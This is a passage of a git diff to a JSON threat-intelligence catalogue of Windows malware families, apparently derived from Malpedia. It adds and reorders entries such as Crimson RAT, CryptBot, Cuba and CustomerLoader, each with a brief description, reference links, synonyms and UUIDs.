provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n\u2022 Command execution module for executing arbitrary Windows Command Prompt commands\r\n\u2022 Password stealer module\r\n\u2022 NT LAN Manager (NTLM) hash stealer module\r\n\u2022 System information gathering module\r\n\u2022 Screenshot module", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke", @@ -19677,10 +20600,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat", - "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://suspected.tistory.com/269", "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg", "https://www.secrss.com/articles/18635" ], "synonyms": [], @@ -19707,10 +20630,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.credomap", - "https://securityscorecard.com/research/apt28s-stealer-called-credomap", - "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", "https://cert.gov.ua/article/341128", + "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", + "https://securityscorecard.com/research/apt28s-stealer-called-credomap", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war" ], "synonyms": [], @@ -19771,43 +20694,44 @@ "value": "Crenufs" }, { - "description": "", + "description": "It was first discovered in 2017 and has since been used to attack organizations around the world. The malware is often distributed through phishing emails or by exploiting vulnerabilities in outdated security software. Once Crimson RAT is installed on a computer, it can be used to steal data, spy on users, and even take control of the infected computers.\r\n\r\nSome of the features of Crimson RAT include:\r\n\r\nRemote control of infected computers\r\nData theft, such as passwords, files, and emails\r\nUser spying\r\nTakeover of infected computers\r\nLocking of infected computers\r\nExtortion of payments", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", - "https://securelist.com/transparent-tribe-part-2/98233/", - "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", + "https://twitter.com/katechondic/status/1502206599166939137", "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", - "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/", - "https://www.secrss.com/articles/24995", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/", - "https://s.tencent.com/research/report/669.html", - "https://www.4hou.com/posts/vLzM", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", - "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html", - "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/", - "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ", - "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/", - "https://twitter.com/teamcymru_S2/status/1501955802025836546", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://securelist.com/transparent-tribe-part-1/98127/", - "https://blog.yoroi.company/research/transparent-tribe-four-years-later", - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF", - "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://twitter.com/teamcymru/status/1351228309632385027", - "https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east", - "https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/", - "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", - "https://twitter.com/katechondic/status/1502206599166939137" + "https://securelist.com/transparent-tribe-part-1/98127/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf", + "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF", + "https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east", + "https://securelist.com/transparent-tribe-part-2/98233/", + "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html", + "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg", + "https://www.4hou.com/posts/vLzM", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://twitter.com/teamcymru_S2/status/1501955802025836546", + "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", + "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ", + "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1", + "https://www.secrss.com/articles/24995", + "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/", + "https://twitter.com/teamcymru/status/1351228309632385027", + "https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/", + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf", + "https://s.tencent.com/research/report/669.html", + "https://blog.yoroi.company/research/transparent-tribe-four-years-later", + "https://www.seqrite.com/blog/transparent-tribe-apt-actively-lures-indian-army-amidst-increased-targeting-of-educational-institutions" ], "synonyms": [ "SEEDOOR", @@ -19836,10 +20760,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf", - "https://twitter.com/swisscom_csirt/status/1354052879158571008", - "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf", "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html" ], "synonyms": [], @@ -19866,20 +20790,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk", - "https://www.youtube.com/watch?v=8x-pGlWpIYI", - "https://twitter.com/MrDanPerez/status/1159459082534825986", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", - "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", - "https://www.youtube.com/watch?v=FttiysUZmDw", "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/", + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html", - "https://content.fireeye.com/apt-41/rpt-apt41/", - "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/" + "https://twitter.com/MrDanPerez/status/1159459082534825986", + "https://www.youtube.com/watch?v=8x-pGlWpIYI", + "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "Motnug", @@ -19904,6 +20828,19 @@ "uuid": "48d697ec-aa34-4d98-83e4-17b736d59a85", "value": "Croxloader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cruloader", + "https://malwarebookreports.com/cruloader-zero2auto/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "22d90775-cdcc-4c80-bb0a-1503275671c7", + "value": "CruLoader" + }, { "description": "", "meta": { @@ -19923,20 +20860,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", - "https://unit42.paloaltonetworks.com/trigona-ransomware-update/", - "https://twitter.com/demonslay335/status/971164798376468481", - "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/", - "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", - "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", - "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300", + "https://securelist.com/cis-ransomware/104452/", "https://twitter.com/albertzsigovits/status/1217866089964679174", - "https://hackmag.com/security/ransomware-russian-style/", - "https://twitter.com/bartblaze/status/1305197264332369920", + "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "https://www.telekom.com/en/blog/group/article/lockdata-auction-631300", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://twitter.com/demonslay335/status/971164798376468481", "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", - "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", - "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/", - "https://securelist.com/cis-ransomware/104452/" + "https://unit42.paloaltonetworks.com/trigona-ransomware-update/", + "https://hackmag.com/security/ransomware-russian-style/", + "https://twitter.com/bartblaze/status/1305197264332369920", + "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", + "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/" ], "synonyms": [ "CryLock" @@ -19963,8 +20900,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", - "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" ], "synonyms": [], "type": [] @@ -19990,24 +20927,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot", - "https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html", - "https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf", - "https://asec.ahnlab.com/en/35981/", - "https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf", - "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/", - "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/", - "https://asec.ahnlab.com/en/31683/", - "https://asec.ahnlab.com/en/31802/", - "https://asec.ahnlab.com/en/24423/", - "https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/", - "https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://fr3d.hk/blog/cryptbot-too-good-to-be-true", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", "https://asec.ahnlab.com/en/26052/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/", + "https://asec.ahnlab.com/en/24423/", + "https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/", + "https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://asec.ahnlab.com/en/35981/", + "https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf", + "https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/", + "https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf", "https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger", + "https://fr3d.hk/blog/cryptbot-too-good-to-be-true", + "https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer", + "https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html", + "https://asec.ahnlab.com/en/31802/", "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer" + "https://asec.ahnlab.com/en/31683/" ], "synonyms": [], "type": [] @@ -20076,16 +21013,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", - "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "https://www.secureworks.com/research/cryptolocker-ransomware", - "https://sites.temple.edu/care/ci-rw-attacks/", - "http://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware" + "http://www.secureworks.com/research/threat-profiles/gold-evergreen", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.secureworks.com/research/threat-profiles/gold-evergreen" ], "synonyms": [], "type": [] @@ -20112,9 +21049,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", "https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/", - "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/", + "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", - "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" + "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/" ], "synonyms": [ "Azer", @@ -20179,13 +21116,13 @@ "value": "CryptoShuffler" }, { - "description": "", + "description": "CryptoWall is a ransomware, is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware and uses a Trojan horse to deliver the malicious payload.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f", - "https://sites.temple.edu/care/ci-rw-attacks/" + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], "type": [] @@ -20211,8 +21148,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", - "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html", - "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/" + "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", + "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" ], "synonyms": [], "type": [] @@ -20252,7 +21189,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox", - "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware" + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://labs.k7computing.com/index.php/encrypted-chaos-analysis-of-crytox-ransomware/" ], "synonyms": [], "type": [] @@ -20293,26 +21231,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/", + "https://securelist.com/cuba-ransomware/110533/", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://lab52.io/blog/cuba-ransomware-analysis/", + "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/", "https://shared-public-reports.s3-eu-west-1.amazonaws.com/Cuba+Ransomware+Group+-+on+a+roll.pdf", "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/", - "https://lab52.io/blog/cuba-ransomware-analysis/", - "https://www.mandiant.com/resources/unc2596-cuba-ransomware", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware", - "https://www.ic3.gov/Media/News/2021/211203-2.pdf", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-335a-stopransomware-cuba-ransomware.pdf", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", - "https://blog.group-ib.com/hancitor-cuba-ransomware", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf", - "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html", - "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis", - "https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/", "https://www.guidepointsecurity.com/blog/using-hindsight-to-close-a-cuba-cold-case/", - "https://www.it-connect.fr/le-ransomware-cuba-sen-prend-aux-serveurs-exchange/" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware", + "https://www.trendmicro.com/en_us/research/22/f/cuba-ransomware-group-s-new-variant-found-using-optimized-infect.html", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-gwisin-kriptor-cuba-and-more", + "https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis", + "https://www.mandiant.com/resources/unc2596-cuba-ransomware", + "https://www.ic3.gov/Media/News/2021/211203-2.pdf", + "https://blog.group-ib.com/hancitor-cuba-ransomware" ], "synonyms": [ "COLDDRAW" @@ -20327,9 +21266,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", + "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", - "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal" + "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html" ], "synonyms": [], "type": [] @@ -20350,14 +21289,30 @@ "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", "value": "Cueisfry" }, + { + "description": "Potential Lazarus sample.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cur1_downloader", + "https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ", + "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html", + "https://twitter.com/RedDrip7/status/1595365451495706624", + "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087", + "value": "Cur1Downloader" + }, { "description": "Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.curator", "https://shared-public-reports.s3.eu-west-1.amazonaws.com/Secrets_behind_the_mysterious_ever101_ransomware.pdf", - "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/", - "https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/" + "https://seguranca-informatica.pt/analysis-of-the-sunnyday-ransomware/", + "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/" ], "synonyms": [ "Ever101", @@ -20381,15 +21336,28 @@ "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528", "value": "Cursed Murderer" }, + { + "description": "CustomerLoader is a .Net-based loader that drops more than 40 different malware families. It appeared in June 2023 and is being distributed via phishing, YouTube videos and malicious websites.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.customerloader", + "https://blog.sekoia.io/customerloader-a-new-malware-distributing-a-wide-variety-of-payloads/#h-c2-servers" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b002e530-38d5-48cf-90a9-5731871fae32", + "value": "CustomerLoader" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://explore.group-ib.com/htct/hi-tech_crime_2018", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", - "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] @@ -20402,20 +21370,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", - "https://darknetdiaries.com/episode/110/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "http://www.secureworks.com/research/threat-profiles/gold-essex", - "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://darknetdiaries.com/episode/110/", "https://www.secureworks.com/research/threat-profiles/gold-essex", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" + "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/", + "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -20424,18 +21392,18 @@ "value": "Cutwail" }, { - "description": "According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim’s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", + "description": "According to Subex Secure, CyberGate is a Remote 